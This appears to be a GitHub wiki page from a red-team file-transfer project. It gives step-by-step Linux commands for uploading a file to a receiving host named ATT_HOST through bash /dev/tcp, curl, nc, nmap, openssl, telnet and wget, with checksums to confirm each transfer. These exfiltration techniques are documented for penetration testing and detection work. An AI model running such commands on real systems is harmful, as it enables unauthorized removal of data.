UL_ _Lin_ _Terminal - lighthouseitsecurity/barabbas GitHub Wiki
OVERVIEW:
- bash (HTTP)
- curl (HTTP; HTTPS)
- nc/nc.traditional (HTTP)
- nmap (HTTP/HTTPS)
- openssl (HTTPS)
- telnet (HTTP)
- wget (HTTP; HTTPS)
(identify supported options - Linux - file upload - terminal)
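# Report which of the upload-capable tools covered on this page are installed.
# Each name is passed to `find -name` as a pattern, so "*telnet" also matches
# binaries whose file name merely ends in "telnet".
tools=("bash" "curl" "nc" "nc.traditional" "nmap" "openssl" "*telnet" "wget")
search_dirs=(/etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt)
echo '[*] terminal - file upload - available options'
# The expansion is quoted: unquoted, bash would glob-expand "*telnet" against
# the current directory before find ever saw the pattern.
for tool in "${tools[@]}"; do
  echo " [*] $tool"
  # stderr is discarded on purpose; unreadable or missing directories are expected.
  find "${search_dirs[@]}" -type f -executable -name "$tool" 2>/dev/null
  echo ''
done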
https://www.gnu.org/software/bash/
TESTED ON: Kali 2023.2
NOTE: uses HTTP PUT
- the target file is base64-encoded first, because bash cannot carry null bytes through the command substitution used to build the request
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the steps that follow (this wiki's lab values).
# They must be exported: the upload step runs its request inside a child
# `bash -c`, which only sees exported variables.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=80             # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] base64-encode target file
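# Encode the file as one unwrapped base64 line (-w0), written next to the
# original. The upload step embeds the file through a command substitution,
# which cannot carry raw null bytes; it also means the whole encoded file is
# held in shell memory while the request is built.
# Paths are quoted so a name containing spaces or glob characters stays one word.
base64 -w0 -- "$PWD/$LFILE" > "$PWD/${LFILE}.b64"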
4. [CLIENT] upload base64-encoded file
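# Local checksum, for comparison with the one printed on the server in step 5.
# MD5 is adequate for spotting transfer corruption, not deliberate tampering.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# The single-quoted script is expanded by the child bash, which is why the
# parameters must be exported and the current directory must hold ${LFILE}.b64.
# fd 3 is opened read/write on bash's /dev/tcp pseudo-device: the request is
# written to it and `cat` then prints the server's reply. This is plain HTTP,
# so the body crosses the network unencrypted and the receiving host is not
# authenticated.
bash -c '{
  echo -ne "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\nConnection: close\r\nContent-Length: $(stat -c %s -- "${LFILE}.b64")\r\n\r\n$(<"${LFILE}.b64")" 1>&3
  cat 0<&3
} 3<>"/dev/tcp/$ATT_HOST/$ATT_PORT"'
# The encoded copy is removed whether or not the upload succeeded.
rm -- "$PWD/${LFILE}.b64"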
5. [SERVER] base64-decode file
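# Run on the receiving server, in the directory holding the uploaded .b64 file.
export LFILE=testfile_200MB
# The encoded upload is deleted only once decoding succeeded, so a failed
# decode does not destroy the only copy.
base64 -d -- "$PWD/${LFILE}.b64" > "$PWD/$LFILE" && rm -- "$PWD/${LFILE}.b64"
# Compare this value with the LOCAL MD5 printed on the client.
echo "[*] LOCAL MD5 (SERVER): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"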
https://linux.die.net/man/1/curl
TESTED ON: Kali 2023.2
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the upload command below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=80             # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] upload file
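# Local checksum, printed first so it can be compared with the server's reply.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# --upload-file sends the file with HTTP PUT; the response body is captured and
# shown as the server-side MD5. Plain HTTP: the file is sent unencrypted and
# the server is not authenticated, so the reported MD5 is only as trustworthy
# as the network path.
# URL and path are quoted so unusual characters in the parameters stay one word.
res=$(curl "http://$ATT_HOST:$ATT_PORT$ATT_PATH" --upload-file "$PWD/$LFILE")
echo "[*] REMOTE MD5 (SERVER): $res"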
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the HTTPS upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=443            # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] upload file
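# Local checksum, printed first so it can be compared with the server's reply.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# --upload-file sends the file with HTTP PUT over TLS.
# -k turns certificate verification off: traffic is encrypted, but the server's
# identity is not checked, so an on-path host can impersonate it. Where the
# server certificate (or its CA) can be copied to the client, `--cacert FILE`
# keeps verification on instead.
# URL and path are quoted so unusual characters in the parameters stay one word.
res=$(curl -k "https://$ATT_HOST:$ATT_PORT$ATT_PATH" --upload-file "$PWD/$LFILE")
echo "[*] REMOTE MD5 (SERVER): $res"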
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the form upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=80             # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] upload file
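# Local checksum, printed first so it can be compared with the server's reply.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# -F posts the file as the multipart/form-data field "file"; the path after '@'
# is relative to the current directory. Plain HTTP: unencrypted, and the
# server is not authenticated.
res=$(curl "http://$ATT_HOST:$ATT_PORT$ATT_PATH" -F "file=@$LFILE")
# Pull the checksum out of the "(MD5 <value>)" fragment of the response. The
# response is passed quoted, so the shell cannot glob-expand or re-split
# whatever text the server returned.
echo "[*] REMOTE MD5 (SERVER): $(printf '%s\n' "$res" | sed -n 's/^.*(MD5 \(\S*\)).*$/\1/p')"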
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the HTTPS form upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=443            # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] upload file
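# Local checksum, printed first so it can be compared with the server's reply.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# -F posts the file as the multipart/form-data field "file" over TLS.
# -k turns certificate verification off: traffic is encrypted, but the server's
# identity is not checked. Where the server certificate (or its CA) can be
# copied to the client, `--cacert FILE` keeps verification on instead.
res=$(curl -k "https://$ATT_HOST:$ATT_PORT$ATT_PATH" -F "file=@$LFILE")
# Pull the checksum out of the "(MD5 <value>)" fragment of the response. The
# response is passed quoted, so the shell cannot glob-expand or re-split
# whatever text the server returned.
echo "[*] REMOTE MD5 (SERVER): $(printf '%s\n' "$res" | sed -n 's/^.*(MD5 \(\S*\)).*$/\1/p')"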
https://linux.die.net/man/1/nc
TESTED ON: Kali 2023.2
NOTE: uses HTTP PUT
- the target file is base64-encoded first, because bash cannot carry null bytes through the command substitution used to build the request
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the nc upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=80             # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] base64-encode target file
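# Encode the file as one unwrapped base64 line (-w0), written next to the
# original. The upload step embeds the file through a command substitution,
# which cannot carry raw null bytes; it also means the whole encoded file is
# held in shell memory while the request is built.
# Paths are quoted so a name containing spaces or glob characters stays one word.
base64 -w0 -- "$PWD/$LFILE" > "$PWD/${LFILE}.b64"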
4. [CLIENT] upload base64-encoded file
(nc)
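# Local checksum, for comparison with the one printed on the server in step 5.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# A hand-written HTTP PUT request piped to nc; Content-Length is the size of
# the encoded file, which is read from the current directory. Plain HTTP: the
# body is sent unencrypted and the receiving host is not authenticated.
# Expansions are quoted so unusual characters in the parameters stay one word.
echo -e "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\nConnection: close\r\nContent-Length: $(stat -c %s -- "${LFILE}.b64")\r\n\r\n$(<"${LFILE}.b64")" \
  | nc "$ATT_HOST" "$ATT_PORT"
# The encoded copy is removed whether or not the upload succeeded.
rm -- "$PWD/${LFILE}.b64"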
(nc.traditional)
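# Local checksum, for comparison with the one printed on the server in step 5.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# Same hand-written HTTP PUT request as the nc variant, piped to
# nc.traditional. Plain HTTP: the body is sent unencrypted and the receiving
# host is not authenticated.
# Expansions are quoted so unusual characters in the parameters stay one word.
echo -e "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\nConnection: close\r\nContent-Length: $(stat -c %s -- "${LFILE}.b64")\r\n\r\n$(<"${LFILE}.b64")" \
  | nc.traditional "$ATT_HOST" "$ATT_PORT"
# The encoded copy is removed whether or not the upload succeeded.
rm -- "$PWD/${LFILE}.b64"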
5. [SERVER] base64-decode file
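# Run on the receiving server, in the directory holding the uploaded .b64 file.
export LFILE=testfile_200MB
# The encoded upload is deleted only once decoding succeeded, so a failed
# decode does not destroy the only copy.
base64 -d -- "$PWD/${LFILE}.b64" > "$PWD/$LFILE" && rm -- "$PWD/${LFILE}.b64"
# Compare this value with the LOCAL MD5 printed on the client.
echo "[*] LOCAL MD5 (SERVER): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"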
https://linux.die.net/man/1/nmap
TESTED ON: Kali 2023.2
NOTE: uses HTTP PUT
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the nmap upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=80             # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] upload file
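# Local checksum; this variant prints no server-side value to compare it with,
# so integrity has to be checked on the server separately.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# The http-put NSE script uploads http-put.file (relative to the current
# directory) to http-put.url on the scanned port.
# Port, host and script arguments are quoted so each stays a single word.
nmap -p "$ATT_PORT" "$ATT_HOST" --script http-put \
  --script-args "http-put.url=$ATT_PATH$LFILE,http-put.file=$LFILE"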
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the nmap HTTPS upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=443            # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] upload file
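# Local checksum; this variant prints no server-side value to compare it with,
# so integrity has to be checked on the server separately.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# Same http-put invocation as the HTTP case, pointed at the TLS port.
# NOTE(review): the page states this works with self-signed certificates, which
# suggests the server certificate is not validated — treat the server as
# unauthenticated unless confirmed otherwise.
# Port, host and script arguments are quoted so each stays a single word.
nmap -p "$ATT_PORT" "$ATT_HOST" --script http-put \
  --script-args "http-put.url=$ATT_PATH$LFILE,http-put.file=$LFILE"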
NOTE: works with self-signed X.509 certificates
https://linux.die.net/man/1/openssl
TESTED ON: Kali 2023.2
NOTE: uses HTTP PUT
- the target file is base64-encoded first, because bash cannot carry null bytes through the command substitution used to build the request
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the openssl upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=443            # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] base64-encode target file
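# Encode the file as one unwrapped base64 line (-w0), written next to the
# original. The upload step embeds the file through a command substitution,
# which cannot carry raw null bytes; it also means the whole encoded file is
# held in shell memory while the request is built.
# Paths are quoted so a name containing spaces or glob characters stays one word.
base64 -w0 -- "$PWD/$LFILE" > "$PWD/${LFILE}.b64"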
4. [CLIENT] upload base64-encoded file
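# Local checksum, for comparison with the one printed on the server in step 5.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# A hand-written HTTP PUT request piped through a TLS connection.
# By default s_client reports a certificate verification failure and carries
# on, which is why self-signed certificates work; it also means the server is
# not authenticated. `-verify_return_error` together with `-CAfile FILE` makes
# the connection fail closed instead.
# Expansions are quoted so unusual characters in the parameters stay one word.
echo -ne "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\nConnection: close\r\nContent-Length: $(stat -c %s -- "${LFILE}.b64")\r\n\r\n$(<"${LFILE}.b64")" \
  | openssl s_client -quiet -connect "$ATT_HOST:$ATT_PORT"
# The encoded copy is removed whether or not the upload succeeded.
rm -- "$PWD/${LFILE}.b64"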
NOTES:
- works with self-signed X.509 certificates
- upon upload, an error will appear in stdout, which can be ignored (i.e. file successfully uploaded)
5. [SERVER] base64-decode file
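# Run on the receiving server, in the directory holding the uploaded .b64 file.
export LFILE=testfile_200MB
# The encoded upload is deleted only once decoding succeeded, so a failed
# decode does not destroy the only copy.
base64 -d -- "$PWD/${LFILE}.b64" > "$PWD/$LFILE" && rm -- "$PWD/${LFILE}.b64"
# Compare this value with the LOCAL MD5 printed on the client.
echo "[*] LOCAL MD5 (SERVER): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"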
https://linux.die.net/man/1/telnet
TESTED ON: Kali 2023.2
NOTES:
- uses HTTP PUT
- the target file is base64-encoded first, because bash cannot carry null bytes through the command substitution used to build the request
- adjust sleep timers, if needed (depending on environment and file size)
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the telnet upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=80             # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] base64-encode target file
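# Encode the file as one unwrapped base64 line (-w0), written next to the
# original. The upload step embeds the file through a command substitution,
# which cannot carry raw null bytes; it also means the whole encoded file is
# held in shell memory while the request is built.
# Paths are quoted so a name containing spaces or glob characters stays one word.
base64 -w0 -- "$PWD/$LFILE" > "$PWD/${LFILE}.b64"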
4. [CLIENT] upload base64-encoded file
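# Local checksum, for comparison with the one printed on the server in step 5.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# A hand-written HTTP PUT request fed to telnet's stdin. The sleeps presumably
# give telnet time to connect before the request is written and time to
# receive the reply before stdin closes; adjust them to the environment and
# file size. Plain HTTP: unencrypted, receiving host not authenticated.
# In bash the closing '}' of a group must follow ';' or a newline; written as
# `sleep 3 }` on one line, bash rejects the command with a syntax error.
{
  sleep 3
  echo -e "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\nHost: $ATT_HOST:$ATT_PORT\nConnection: close\nContent-Length: $(stat -c %s -- "${LFILE}.b64")\n\n$(<"${LFILE}.b64")"
  sleep 3
} | telnet "$ATT_HOST" "$ATT_PORT"
# The encoded copy is removed whether or not the upload succeeded.
rm -- "$PWD/${LFILE}.b64"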
5. [SERVER] base64-decode file
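# Run on the receiving server, in the directory holding the uploaded .b64 file.
export LFILE=testfile_200MB
# The encoded upload is deleted only once decoding succeeded, so a failed
# decode does not destroy the only copy.
base64 -d -- "$PWD/${LFILE}.b64" > "$PWD/$LFILE" && rm -- "$PWD/${LFILE}.b64"
# Compare this value with the LOCAL MD5 printed on the client.
echo "[*] LOCAL MD5 (SERVER): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"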
https://linux.die.net/man/1/wget
TESTED ON: Kali 2023.2
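NOTE: wget's existing options for file upload (--post-file, --body-file) use an unsupported upload technique (application/x-www-form-urlencoded), so the command below assembles a multipart/form-data body by hand and sends it with --post-file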
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the wget upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=80             # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] upload file
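# Local checksum, printed first so it can be compared with the server's reply.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# Random 32-hex-character marker used in the multipart delimiter lines.
marker=$(tr -dc a-f0-9 </dev/urandom | head -c 32)
# The request body is staged in a file made by mktemp: private and
# unpredictably named. A fixed name under /tmp can be pre-created or symlinked
# by another local user, exposing the file or redirecting the write.
if body_file=$(mktemp); then
  # NOTE(review): the header below declares boundary=$marker with no ';' before
  # it, while the delimiter lines prefix the marker with a run of dashes. Both
  # are kept exactly as published, presumably because the project's own server
  # accepts them — confirm before using this against a stricter parser.
  {
    echo -e '--------------------------'"$marker"'\nContent-Disposition: form-data; name="file"; filename="'"$LFILE"'"\nContent-Type: application/octet-stream\n'
    cat -- "$PWD/$LFILE"
    echo -e "\n--------------------------$marker--"
  } > "$body_file"
  # Plain HTTP: the file is sent unencrypted and the server is not authenticated.
  res=$(wget -qO- --header="Content-type: multipart/form-data boundary=$marker" --post-file "$body_file" "http://$ATT_HOST:$ATT_PORT$ATT_PATH")
  # The response is passed quoted so the shell cannot glob-expand or re-split it.
  echo "[*] REMOTE MD5 (SERVER): $(printf '%s\n' "$res" | sed -n 's/^.*(MD5 \(\S*\)).*$/\1/p')"
  rm -f -- "$body_file"
fi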
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
# Transfer parameters for the wget HTTPS upload below (this wiki's lab values).
# Exported, so processes started from this shell inherit them.
ATT_HOST=192.168.5.11   # host running the receiving server
ATT_PORT=443            # port that server listens on
ATT_PATH=/              # URL path the upload is sent to
LFILE=testfile_200MB    # file to send, looked up in the current directory
export ATT_HOST ATT_PORT ATT_PATH LFILE
3. [CLIENT] upload file
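# Local checksum, printed first so it can be compared with the server's reply.
echo "[*] LOCAL MD5 (CLIENT): $(md5sum -- "$PWD/$LFILE" | cut -d ' ' -f1)"
# Random 32-hex-character marker used in the multipart delimiter lines.
marker=$(tr -dc a-f0-9 </dev/urandom | head -c 32)
# The request body is staged in a file made by mktemp: private and
# unpredictably named. A fixed name under /tmp can be pre-created or symlinked
# by another local user, exposing the file or redirecting the write.
if body_file=$(mktemp); then
  # NOTE(review): the header below declares boundary=$marker with no ';' before
  # it, while the delimiter lines prefix the marker with a run of dashes. Both
  # are kept exactly as published, presumably because the project's own server
  # accepts them — confirm before using this against a stricter parser.
  {
    echo -e '--------------------------'"$marker"'\nContent-Disposition: form-data; name="file"; filename="'"$LFILE"'"\nContent-Type: application/octet-stream\n'
    cat -- "$PWD/$LFILE"
    echo -e "\n--------------------------$marker--"
  } > "$body_file"
  # --no-check-certificate turns certificate verification off: traffic is
  # encrypted, but the server's identity is not checked. Where the server
  # certificate (or its CA) can be copied to the client,
  # `--ca-certificate=FILE` keeps verification on instead.
  res=$(wget -qO- --header="Content-type: multipart/form-data boundary=$marker" --post-file "$body_file" --no-check-certificate "https://$ATT_HOST:$ATT_PORT$ATT_PATH")
  # The response is passed quoted so the shell cannot glob-expand or re-split it.
  echo "[*] REMOTE MD5 (SERVER): $(printf '%s\n' "$res" | sed -n 's/^.*(MD5 \(\S*\)).*$/\1/p')"
  rm -f -- "$body_file"
fi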